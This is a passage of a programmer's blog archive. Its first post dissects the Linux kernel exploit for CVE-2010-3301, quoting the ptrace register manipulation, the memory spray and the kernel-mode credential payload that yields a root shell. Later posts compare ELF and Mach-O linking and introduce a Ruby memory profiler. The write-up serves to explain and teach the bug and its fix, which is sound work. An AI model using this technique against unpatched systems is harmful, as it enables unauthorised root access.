time to bleed by Joe Damato

technical ramblings from a wanna-be unix dinosaur

Archive for the ‘x86’ tag

detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301)



If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.

This article is long and technical; prepare yourself.

ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

  1. Software interrupt 0x80.
  2. The sysenter family of instructions.

The sysenter family of instructions is a faster syscall interface than the traditional int 0x80 interface, but isn’t available on some older 32-bit Intel CPUs.

The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call, thus maintaining support for this older system call interface.

This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the IA32 syscall emulation code we see some code in place to support ptrace [1]:

ENTRY(ia32_syscall)
/* . . . */
        GET_THREAD_INFO(%r10)
          orl $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Let’s take a look [2]:

ia32_tracesys:                   
        /* . . . */
        call syscall_trace_enter
        LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call
END(ia32_syscall)

Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to invoke the desired system call. Reloading them from the saved copy on the stack ensures that the system call is invoked with the values the tracer left there.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

Let’s take a look at the LOAD_ARGS32 macro [3]:

.macro LOAD_ARGS32 offset, _r9=0
/* . . . */
movl \offset+40(%rsp),%ecx
movl \offset+48(%rsp),%edx
movl \offset+56(%rsp),%esi
movl \offset+64(%rsp),%edi
.endm

Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.

Let’s take a look at ia32_do_call, which actually transfers execution to the system call [4]:

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8) # xxx: rip relative

The system call invocation code calls the function whose address is stored at ia32_sys_call_table + (8 * %rax). Each table entry is an 8-byte function pointer, so this is entry number %rax of ia32_sys_call_table.

subtle bug leads to sexy exploit

This bug was originally discovered by the Polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.

The exploit is made possible by three key things:

  1. The register %eax is not touched in the LOAD_ARGS32 macro and can be set to any arbitrary value by a call to ptrace.
  2. The ia32_do_call uses %rax, not %eax, when indexing into the ia32_sys_call_table.
  3. The %eax check (cmpl $(IA32_NR_syscalls-1),%eax) in ia32_tracesys only checks %eax. Any bits in the upper 32bits of %rax will be ignored by this check.

These three stars align and allow an attacker to cause an integer overflow in ia32_do_call, causing the kernel to hand off execution to an arbitrary address.
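To make the mismatch concrete, here is a small userland sketch in C (not kernel code) of the two views of the register. NR_SYSCALLS_SKETCH is a made-up stand-in for IA32_NR_syscalls and the function names are hypothetical; the only thing it is meant to show is that a 32-bit compare and a 64-bit index disagree about the same value.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical stand-in for IA32_NR_syscalls; the real value depends on the kernel. */
#define NR_SYSCALLS_SKETCH 337u

/* Mirrors `cmpl $(IA32_NR_syscalls-1),%eax`: only the low 32 bits are compared. */
static bool passes_truncated_check(uint64_t rax)
{
    uint32_t eax = (uint32_t)rax;          /* upper 32 bits are silently dropped */
    return eax <= NR_SYSCALLS_SKETCH - 1u; /* `ja` bails out only when eax is above */
}

/* What a comparison against the whole 64-bit register would conclude. */
static bool passes_full_check(uint64_t rax)
{
    return rax <= (uint64_t)(NR_SYSCALLS_SKETCH - 1u);
}

/* Byte offset that `call *ia32_sys_call_table(,%rax,8)` adds to the table base. */
static uint64_t table_byte_offset(uint64_t rax)
{
    return rax * 8u;
}
```

With rax set to 0x800000101, the truncated check sees 0x101 and lets the call through, while the byte offset is computed from the full value.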

Damnnnnn, that’s hot.

the exploit, step by step

The exploit code is available here and was written by Ben Hawkes and others.

The exploit begins execution by forking; the child then executes a second copy of the exploit binary:

        if ( (pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }

The child process is set up to be traced by calling ptrace with PTRACE_TRACEME.

The parent process enters a loop:

        for (;;) {
                if (wait(&status) != pid)
                        continue;

                /* ... */
                
                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                }
 
                /* ... */
 
                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
         }

The parent calls wait and blocks until the child enters a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow, as we’ll see shortly. ptrace is then invoked to resume execution in the child.

While this is happening, the child process is executing. It begins by looking up the addresses of two symbols in the kernel:

	commit_creds = (_commit_creds) get_symbol("commit_creds");
	/* ... */

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
       /* ... */

Next, the child process attempts to create an anonymous memory mapping using mmap:

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
          /* ... */            

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).
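The arithmetic is easy to check by hand, but here is a minimal C sketch of it anyway. The helper names are mine, and PAGE_SIZE_SKETCH assumes 4 KiB pages; the base address and the rax value are the ones quoted above.

```c
#include <stdint.h>

/* Assumption: 4 KiB pages, which is what makes 0x3f80000808 round down to 0x3f80000000. */
#define PAGE_SIZE_SKETCH 4096ULL

/* base + rax * 8, computed the way the CPU does it: modulo 2^64. */
static uint64_t wrapped_target(uint64_t base, uint64_t rax)
{
    return base + rax * 8u; /* unsigned overflow wraps around, it does not trap */
}

/* Round an address down to the start of its page, as a page-granular mapping requires. */
static uint64_t page_align_down(uint64_t addr)
{
    return addr & ~(PAGE_SIZE_SKETCH - 1u);
}
```

Plugging in 0xffffffff80000000 and 0x800000101 gives 0x3f80000808, which rounds down to 0x3f80000000.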

Next, the child process prepares a function called kernelmodecode, which makes use of the symbols commit_creds and prepare_kernel_cred that were looked up earlier:

int kernelmodecode(void *file, void *vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

The address of that function is written over and over to the 64mb memory that was mapped in:

        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;
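The reason for filling the whole region is that the exploit does not need to know exactly which slot the kernel will read: every 8-byte slot holds the same pointer. A harmless userland sketch of that idea follows, using malloc instead of a fixed mmap; payload and call_through_slot are hypothetical names, not part of the exploit.

```c
#include <stdint.h>
#include <stdlib.h>

typedef int (*handler_fn)(void);

/* Stand-in for kernelmodecode; it just returns a recognizable value. */
static int payload(void)
{
    return 42;
}

/* Fill a table with the same function address, then call through one slot.
 * Returns -1 on allocation failure or an out-of-range slot. */
static int call_through_slot(size_t n_slots, size_t slot)
{
    uintptr_t *table = malloc(n_slots * sizeof *table);
    if (table == NULL || slot >= n_slots) {
        free(table);
        return -1;
    }
    for (size_t i = 0; i < n_slots; i++)
        table[i] = (uintptr_t)payload;   /* same address in every slot */

    handler_fn fn = (handler_fn)table[slot]; /* whichever slot is read, it is payload */
    int result = fn();
    free(table);
    return result;
}
```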

Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:

        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");
 
        /* . . . */
        execl("/bin/sh", "bin/sh", NULL);

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.

The child executes the erroneous check described above:

        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call

Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode setting the privilege level of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper half of rax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.

Conclusions

  • Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
  • The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
  • Code reviews play a really important part of overall security for the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
  • I'm not a Ruby programmer.


References

  1. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424
  2. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439
  3. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50
  4. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430

Written by Joe Damato

September 27th, 2010 at 4:59 am

Garbage Collection and the Ruby Heap (from railsconf)


Written by Joe Damato

June 8th, 2010 at 9:38 am

Dynamic symbol table duel: ELF vs Mach-O, round 2




The intention of this post is to continue highlighting some of the similarities and differences between ELF and Mach-O that I encountered while building memprof. The previous post in this series can be found here.

What is a symbol table?

A symbol table is simply a list of names in an object. The names in the list may be names of functions, initialized/uninitialized memory regions, or other things depending on the object format. The symbol table does not need to be mapped into a running process and is only useful for debugging. The symbol table (and other sections) may be removed from an object when you use strip.

Symbol tables in ELF objects

An entry in the symbol table in an ELF object can best be described by the following struct from /usr/include/elf.h:

typedef struct
{
  Elf64_Word    st_name;                /* Symbol name (string tbl index) */
  unsigned char st_info;                /* Symbol type and binding */
  unsigned char st_other;               /* Symbol visibility */
  Elf64_Section st_shndx;               /* Section index */
  Elf64_Addr    st_value;               /* Symbol value */
  Elf64_Xword   st_size;                /* Symbol size */
} Elf64_Sym;

In most cases, this structure is used to find the mapping from a symbol name to the address where it lives, although different symbol types (specified by st_info) provide mappings from symbols to other data.

The st_name field is an index into a section called .strtab, which is just a table of strings.
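As a rough illustration of how st_name and the string table fit together, here is a C sketch of a linear name lookup. To keep it self-contained it uses a local struct, sketch_sym, with the same field order as Elf64_Sym rather than including elf.h; find_symbol is a hypothetical helper, and real tools would first have to locate the symbol and string tables in the file.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Local mirror of Elf64_Sym (same field order and widths). */
struct sketch_sym {
    uint32_t      st_name;   /* offset of the name inside the string table */
    unsigned char st_info;
    unsigned char st_other;
    uint16_t      st_shndx;
    uint64_t      st_value;  /* usually the symbol's address */
    uint64_t      st_size;   /* number of bytes the symbol occupies */
};

/* Walk the symbol table and compare each name, found via st_name, to `name`.
 * Returns NULL when no entry matches. */
static const struct sketch_sym *find_symbol(const struct sketch_sym *syms, size_t nsyms,
                                            const char *strtab, size_t strtab_size,
                                            const char *name)
{
    for (size_t i = 0; i < nsyms; i++) {
        if (syms[i].st_name >= strtab_size)
            continue; /* ignore entries whose name offset is out of range */
        if (strcmp(strtab + syms[i].st_name, name) == 0)
            return &syms[i];
    }
    return NULL;
}
```

A linear scan like this is fine for poking around, but it is also exactly the cost that a hash section is there to avoid.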

Symbol tables in Mach-O objects

Let’s take a look at the struct for a symbol table entry in a Mach-O object from /usr/include/mach-o/nlist.h:

struct nlist_64 {
    union {
        uint32_t  n_strx; /* index into the string table */
    } n_un;
    uint8_t n_type;        /* type flag */
    uint8_t n_sect;        /* section number or NO_SECT */
    uint16_t n_desc;       /* see <mach-o/stab.h> */
    uint64_t n_value;      /* value of this symbol (or stab offset) */
};

It looks very similar. The immediately noticeable difference from ELF:

  • lack of size field: The size field in ELF objects describes the number of bytes occupied by the symbol. This is actually pretty useful, especially for memprof. The lack of this field in Mach-O was a source of frustration for Jake when he was implementing Mach-O support.

What is a dynamic symbol table?

Shared objects in both Mach-O and ELF have a symbol table listing only functions that are exported by the object.

This table is used during dynamic linking and is mapped into the process’ address space when the object is loaded, unlike the symbol table which is just used for debugging.

The dynamic symbol table is a subset of the symbol table.

Dynamic symbol table in ELF objects

The dynamic symbol table in ELF objects is stored in a section named .dynsym. The indexes stored in the st_name field (from the structure listed above) are indexes into the string table in a section named .dynstr. .dynstr is a string table specifically for entries in the dynamic symbol table.

If you know the symbol you care about, you can simply calculate a hash of the symbol name to find the symbol table entry for that symbol. Unfortunately, there is not very much documentation about the hash function that is to be used.

Your two options are the original System V hash and the GNU hash. The sections storing the hash table data for an object are called .hash and .gnu.hash, respectively.
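For reference, here is a C sketch of the two hash functions usually associated with those sections: the one given in the System V ELF specification (for .hash) and the "times 33, starting at 5381" hash used for .gnu.hash. The function names are mine. This only covers hashing the name; walking the bucket and chain arrays is a separate step that isn't shown.

```c
#include <stdint.h>

/* System V ABI hash from the ELF specification, used with .hash. */
static uint32_t sysv_elf_hash(const char *name)
{
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name; *p != 0; p++) {
        h = (h << 4) + *p;
        uint32_t g = h & 0xf0000000u; /* top nibble, folded back in below */
        if (g != 0)
            h ^= g >> 24;
        h &= ~g;
    }
    return h;
}

/* GNU hash, used with .gnu.hash: h = h * 33 + c, starting from 5381. */
static uint32_t gnu_hash(const char *name)
{
    uint32_t h = 5381;
    for (const unsigned char *p = (const unsigned char *)name; *p != 0; p++)
        h = h * 33u + *p;
    return h;
}
```

For the name "printf" these give 0x077905a6 and 0x156b2bb8, respectively.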

Dynamic symbol table in Mach-O objects

Finding the dynamic symbol table in a Mach-O object is a bit complicated. The pieces to the puzzle are found across different structures and the documentation on how it all works is sparse.

Mach-O objects have a load command called LC_DYSYMTAB which describes information about the dynamic symbol table in Mach-O objects.

I’ve shortened the structure definition, as it is quite large and contains documentation about stuff that is not directly relevant to this post. From /usr/include/mach-o/loader.h:

struct dysymtab_command {
    uint32_t cmd; /* LC_DYSYMTAB */
    uint32_t cmdsize; /* sizeof(struct dysymtab_command) */

    /* .... */

    /*
     * The sections that contain "symbol pointers" and "routine stubs" have
     * indexes and (implied counts based on the size of the section and fixed
     * size of the entry) into the "indirect symbol" table for each pointer
     * and stub.  For every section of these two types the index into the
     * indirect symbol table is stored in the section header in the field
     * reserved1.  An indirect symbol table entry is simply a 32bit index into
     * the symbol table to the symbol that the pointer or stub is referring to.
     * The indirect symbol table is ordered to match the entries in the section.
     */
    uint32_t indirectsymoff; /* file offset to the indirect symbol table */
    uint32_t nindirectsyms;  /* number of indirect symbol table entries */

    /* .... */
};

The LC_DYSYMTAB load command provides the fields indirectsymoff and nindirectsyms, which describe the offset into the file where the indirect symbol table lives and the number of entries in the table, respectively.

The dynamic symbol table in Mach-O is surprisingly simple. Each entry in the table is just a 32bit index into the symbol table. The dynamic symbol table is just a list of indexes and nothing else.

It turns out there are a few more pieces to the puzzle.

Take a look at the definition for a Mach-O section:

struct section_64 { /* for 64-bit architectures */
  char    sectname[16]; /* name of this section */
  char    segname[16];  /* segment this section goes in */
  uint64_t  addr;   /* memory address of this section */
  uint64_t  size;   /* size in bytes of this section */
  uint32_t  offset;   /* file offset of this section */
  uint32_t  align;    /* section alignment (power of 2) */
  uint32_t  reloff;   /* file offset of relocation entries */
  uint32_t  nreloc;   /* number of relocation entries */
  uint32_t  flags;    /* flags (section type and attributes)*/
  uint32_t  reserved1;  /* reserved (for offset or index) */
  uint32_t  reserved2;  /* reserved (for count or sizeof) */
  uint32_t  reserved3;  /* reserved */
};

It turns out that the fields reserved1 and reserved2 are useful too.

If a section_64 structure describes a symbol_stub or __la_symbol_ptr section (read the previous post to learn about these sections), then the reserved1 field holds the index into the dynamic symbol table of that section’s first entry.

symbol_stub sections also make use of the reserved2 field: the size of a single stub entry is stored in reserved2. Otherwise, the field is set to 0.
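Putting the pieces together, the name behind the Nth stub or pointer in a section can be found by going through the indirect table, then the symbol table, then the string table. Here is a C sketch of that chain under some assumptions: all three tables are already loaded into memory, sketch_nlist64 is a local mirror of nlist_64, and stub_symbol_name is a hypothetical helper.

```c
#include <stddef.h>
#include <stdint.h>

/* Local mirror of struct nlist_64 (the n_un union collapsed to n_strx). */
struct sketch_nlist64 {
    uint32_t n_strx;
    uint8_t  n_type;
    uint8_t  n_sect;
    uint16_t n_desc;
    uint64_t n_value;
};

/* Name of entry number `entry` in a section whose header has the given reserved1.
 * Returns NULL if any index along the way is out of range. */
static const char *stub_symbol_name(const uint32_t *indirect, uint32_t nindirectsyms,
                                    const struct sketch_nlist64 *symtab, uint32_t nsyms,
                                    const char *strtab, uint32_t strsize,
                                    uint32_t reserved1, uint32_t entry)
{
    uint64_t slot = (uint64_t)reserved1 + entry; /* section's first slot + entry */
    if (slot >= nindirectsyms)
        return NULL;

    uint32_t sym_index = indirect[slot];         /* 32bit index into the symbol table */
    if (sym_index >= nsyms)
        return NULL;                             /* not a usable symbol table index */

    uint32_t strx = symtab[sym_index].n_strx;
    if (strx >= strsize)
        return NULL;
    return strtab + strx;
}
```

For a symbol_stub section, the number of entries to iterate over would be the section size divided by reserved2.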

Two notable differences between the dynamic symbol tables

  • There is an explicit section in ELF that contains Elf64_Sym entries. On Mach-O it’s just a list of 32bit offsets.
  • ELF provides a .hash section and/or .gnu.hash section to speed up symbol lookup. Mach-O does not.

What happens when you run strip?

Let’s use strip with no options (other than the filename).

On ELF:

  • All .debug_* sections are removed. These sections contain extra debugging information that helps debuggers figure out more precisely what went wrong.
  • .symtab section is removed.
  • .strtab section is removed.

On Mach-O:

  • Only undefined symbols and dynamic symbols are left in the symbol table. Everything else is removed.

How to strip so I can debug later (linux only)

If you decide to strip your binary please be considerate to future hackers who may need to debug your app for some reason.

You can be considerate by following the directions in strip(1):

1. Link the executable as normal. Assuming that it is called
“foo” then…

2. Run “objcopy --only-keep-debug foo foo.dbg” to
create a file containing the debugging info.

3. Run “objcopy --strip-debug foo” to create a
stripped executable.

4. Run “objcopy --add-gnu-debuglink=foo.dbg foo”
to add a link to the debugging info into the stripped executable.

And don’t forget to put your debugging information somewhere easily accessible and googleable.

If you do this: you are cool. If you don’t…

Conclusion

  1. I like the way ELF does dynamic symbol tables, the gnu_debuglink section, and the lookup hash table for dynamic symbols. All of these pieces are really useful and I am glad they exist.
  2. The indirect symbol table was a bit of a pain to track down on Mach-O as the information is hard to parse on the first pass. To be fair, it is all there if you google around a bit and put the pieces together.
  3. On Linux, if you strip, please add a gnu_debuglink section and put the debug information somewhere I can find it.

Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.


Written by Joe Damato

June 1st, 2010 at 5:59 am

Posted in linux,osx,systems,x86


Dynamic Linking: ELF vs. Mach-O




The intention of this post is to highlight some of the similarities and differences between ELF and Mach-O dynamic linking that I encountered while building memprof.

I hope to write more posts about similarities and differences in other aspects of Mach-O and ELF that I stumbled across to shed some light on what goes on down there and provide (in some cases) the only documentation.

Procedure Linkage Table

The procedure linkage table (PLT) is used to determine the absolute address of a function at runtime. Both Mach-O and ELF objects have PLTs that are generated when the object is built. The initial table simply invokes the dynamic linker, which finds the symbol you want. The way this works is very similar at a high level in ELF and Mach-O, but there are some implementation differences that I thought were worth mentioning.

Mach-O PLT arrangement

Mach-O objects have several different sections across different segments that are all involved to create a PLT entry for a specific symbol.

Consider the following assembly stub which calls out to the PLT entry for malloc:

# MACH-O calling a PLT entry (ELF is nearly identical)
0x000000010008c504 [str_new+52]:	callq  0x10009ebbc [dyld_stub_malloc]

The dyld_stub prefix is added by GDB to let the user know that the callq instruction is calling a PLT entry and not malloc itself. The address 0x10009ebbc is the first instruction of malloc‘s PLT entry in this Mach-O object. In Mach-O terminology, the instruction at 0x10009ebbc is called a symbol stub. Symbol stubs in Mach-O objects are found in the __TEXT segment in the __symbol_stub1 section.

Let’s examine some instructions at the symbol stub address above:

# MACH-O "symbol stubs" for malloc and other functions
0x10009ebbc [dyld_stub_malloc]:	  jmpq   *0x3ae46(%rip)        # 0x1000d9a08
0x10009ebc2 [dyld_stub_realloc]:  jmpq   *0x3ae48(%rip)        # 0x1000d9a10
0x10009ebc8 [dyld_stub_seekdir$INODE64]:	jmpq   *0x3ae4c(%rip)  # 0x1000d9a20
. . . .

Each Mach-O symbol stub is just a single jmpq instruction. Via an entry in a table, that jmpq instruction either:

  • Invokes the dynamic linker to find the symbol and transfer execution there, OR
  • Transfers execution directly to the function.

In the example above, GDB is telling us that the address of the table entry for malloc is 0x1000d9a08. This table entry is stored in a section called the __la_symbol_ptr within the __DATA segment.

Before malloc has been resolved, the address in that table entry points to a helper function which (eventually) invokes the dynamic linker to find malloc and fill in its address in the table entry.

Let’s take a look at what a few entries of the helper functions look like:

# MACH-O stub helpers
0x1000a08d4 [stub helpers+6986]:	pushq  $0x3b73
0x1000a08d9 [stub helpers+6991]:	jmpq   0x10009ed8a [stub helpers]
0x1000a08de [stub helpers+6996]:	pushq  $0x3b88
0x1000a08e3 [stub helpers+7001]:	jmpq   0x10009ed8a [stub helpers]
0x1000a08e8 [stub helpers+7006]:	pushq  $0x3b9e
0x1000a08ed [stub helpers+7011]:	jmpq   0x10009ed8a [stub helpers]
. . . . 

Each symbol that has a PLT entry has two instructions above: a pushq and jmpq pair. This instruction sequence sets an ID for the desired function and then invokes the dynamic linker. The dynamic linker looks up this ID so it knows which function it should be looking for.

ELF PLT arrangement

ELF objects have the same mechanism, but organize each PLT entry into chunks instead of splicing them out across different sections. Let’s take a look at a PLT entry for malloc in an ELF object:

# ELF complete PLT entry for malloc
0x40f3d0 [malloc@plt]:	jmpq   *0x2c91fa(%rip)        # 0x6d85d0
0x40f3d6 [malloc@plt+6]:	pushq  $0x2f
0x40f3db [malloc@plt+11]:	jmpq   0x40f0d0
. . . .

Much like a Mach-O object, an ELF object uses a table entry to direct the flow of execution to either invoke the dynamic linker or transfer directly to the desired function if it has already been resolved.

Two differences to point out here:

  1. ELF puts the entire PLT entry together in a nicely named section called .plt instead of splicing it out across multiple sections.
  2. The table entries indirected through with the initial jmpq instruction are stored in a section named: .got.plt.
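The lazy binding idea shared by both formats can be modeled in plain C with a function pointer that starts out pointing at a resolver and gets patched on first use. This is only a toy model: table_slot plays the role of the __la_symbol_ptr or .got.plt entry, lazy_stub plays the role of the stub helper plus dynamic linker, and all the names are hypothetical.

```c
#include <stddef.h>

typedef int (*target_fn)(int);

/* The "real" function the caller ultimately wants to reach. */
static int real_double(int x)
{
    return 2 * x;
}

static int resolver_calls = 0;   /* counts how often the slow path runs */
static int lazy_stub(int x);

/* Table entry: initially points at the resolver, like an unresolved PLT slot. */
static target_fn table_slot = lazy_stub;

/* Slow path: "find" the symbol, patch the table entry, then finish the call. */
static int lazy_stub(int x)
{
    resolver_calls++;
    table_slot = real_double;
    return table_slot(x);
}

/* Equivalent of the stub's `jmpq *slot(%rip)`: always jump through the table. */
static int call_via_plt(int x)
{
    return table_slot(x);
}
```

The first call through call_via_plt takes the slow path; every later call goes straight to real_double because the table entry has been overwritten.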

Both invoke an assembly trampoline…

Both Mach-O and ELF objects are set up to invoke the runtime dynamic linker. Both need an assembly trampoline to bridge the gap between the application and the linker. On 64-bit Intel based systems, linkers in both systems must comply with the same Application Binary Interface (ABI).

Strangely enough, the two linkers have slightly different assembly trampolines even though they share the same calling convention [1] [2].

Both trampolines ensure that the program stack is 16-byte aligned to comply with the amd64 ABI’s calling convention. Both trampolines also take care to save the “general purpose” caller-saved registers prior to invoking the dynamic linker, but it turns out that the trampoline in Linux does not save or restore the SSE registers. It turns out that this “shouldn’t” matter, so long as glibc takes care not to use any of those registers in the dynamic linker. OSX takes a more conservative approach and saves and restores the SSE registers before and after calling out to the dynamic linker.

I’ve included a snippet from the two trampolines below and some comments so you can see the differences up close.

Different trampolines for the same ABI

The OSX trampoline:

dyld_stub_binder:
  pushq   %rbp
  movq    %rsp,%rbp
  subq    $STACK_SIZE,%rsp  # at this point stack is 16-byte aligned because two meta-parameters where pushed
  movq    %rdi,RDI_SAVE(%rsp) # save registers that might be used as parameters
  movq    %rsi,RSI_SAVE(%rsp)
  movq    %rdx,RDX_SAVE(%rsp)
  movq    %rcx,RCX_SAVE(%rsp)
  movq    %r8,R8_SAVE(%rsp)
  movq    %r9,R9_SAVE(%rsp)
  movq    %rax,RAX_SAVE(%rsp)
  movdqa    %xmm0,XMMM0_SAVE(%rsp)
  movdqa    %xmm1,XMMM1_SAVE(%rsp)
  movdqa    %xmm2,XMMM2_SAVE(%rsp)
  movdqa    %xmm3,XMMM3_SAVE(%rsp)
  movdqa    %xmm4,XMMM4_SAVE(%rsp)
  movdqa    %xmm5,XMMM5_SAVE(%rsp)
  movdqa    %xmm6,XMMM6_SAVE(%rsp)
  movdqa    %xmm7,XMMM7_SAVE(%rsp)
  movq    MH_PARAM_BP(%rbp),%rdi  # call fastBindLazySymbol(loadercache, lazyinfo)
  movq    LP_PARAM_BP(%rbp),%rsi
  call    __Z21_dyld_fast_stub_entryPvl

The OSX trampoline saves all the caller-saved registers as well as the %xmm0 - %xmm7 registers prior to invoking the dynamic linker with that last call instruction. These registers are all restored after the call instruction, but I left that out for the sake of brevity.

The Linux trampoline:

  subq $56,%rsp 
  cfi_adjust_cfa_offset(72) # Incorporate PLT
  movq %rax,(%rsp)  # Preserve registers otherwise clobbered.
  movq %rcx, 8(%rsp)
  movq %rdx, 16(%rsp)
  movq %rsi, 24(%rsp)
  movq %rdi, 32(%rsp)
  movq %r8, 40(%rsp)
  movq %r9, 48(%rsp)
  movq 64(%rsp), %rsi # Copy args pushed by PLT in register.
  movq %rsi, %r11   # Multiply by 24
  addq %r11, %rsi
  addq %r11, %rsi
  shlq $3, %rsi
  movq 56(%rsp), %rdi # %rdi: link_map, %rsi: reloc_offset
  call _dl_fixup    # Call resolver.

The Linux trampoline doesn’t touch the SSE registers because it assumes that the dynamic linker will not modify them, thus avoiding a save and restore.
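One small detail in the Linux trampoline is the “Multiply by 24” sequence, which avoids a multiply instruction by adding the value to itself twice and then shifting left by 3. My reading is that 24 is the size of one Elf64_Rela relocation record (three 8-byte fields), so the index pushed by the PLT becomes a byte offset; treat that interpretation as an assumption. A C sketch of the same steps, with a hypothetical function name:

```c
#include <stdint.h>

/* Same steps as the movq/addq/addq/shlq sequence in the trampoline. */
static uint64_t times24_like_trampoline(uint64_t index)
{
    uint64_t r11 = index;  /* movq %rsi, %r11 */
    uint64_t rsi = index;
    rsi += r11;            /* addq %r11, %rsi  -> 2 * index */
    rsi += r11;            /* addq %r11, %rsi  -> 3 * index */
    rsi <<= 3;             /* shlq $3, %rsi    -> 24 * index */
    return rsi;
}
```

For the malloc PLT entry shown earlier, which pushes 0x2f, this works out to 0x2f * 24 = 1128.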

Conclusion

  • Tracing program execution from call site to the dynamic linker is pretty interesting and there is a lot to learn along the way.
  • glibc not saving and restoring %xmm0-%xmm7 kind of scares me, but there is a unit test included that disassembles the built ld.so searching it to make sure that those registers are never touched. It is still a bit frightening.
  • Stay tuned for more posts explaining other interesting similarities and differences between Mach-O and ELF coming soon.


References

  1. http://developer.apple.com/mac/library/documentation/DeveloperTools/Conceptual/LowLevelABI/140-x86-64_Function_Calling_Conventions/x86_64.html#//apple_ref/doc/uid/TP40005035-SW1
  2. http://www.x86-64.org/documentation/abi.pdf

Written by Joe Damato

May 12th, 2010 at 7:00 am

memprof: A Ruby level memory profiler




What is memprof and why do I care?

memprof is a Ruby gem which supplies memory profiler functionality similar to bleak_house without patching the Ruby VM. You just install the gem, call a function or two, and off you go.

Where do I get it?

memprof is available on gemcutter, so you can just:

gem install memprof

Feel free to browse the source code at: http://github.com/ice799/memprof.

How do I use it?

Using memprof is simple. Before we look at some examples, let me explain more precisely what memprof is measuring.

memprof is measuring the number of objects created and not destroyed during a segment of Ruby code. The ideal use case for memprof is to show you where objects that do not get destroyed are being created:

  • Objects are created and not destroyed when you create new classes. This is a good thing.
  • Sometimes garbage objects sit around until garbage_collect has had a chance to run. These objects will go away.
  • Yet in other cases you might be holding a reference to a large chain of objects without knowing it. Until you remove this reference, the entire chain of objects will remain in memory taking up space.

memprof will show objects created in all cases listed above.

OK, now let’s take a look at two examples and their output.

A simple program with an obvious memory “leak”:

require 'memprof'

@blah = Hash.new([])

Memprof.start
100.times {
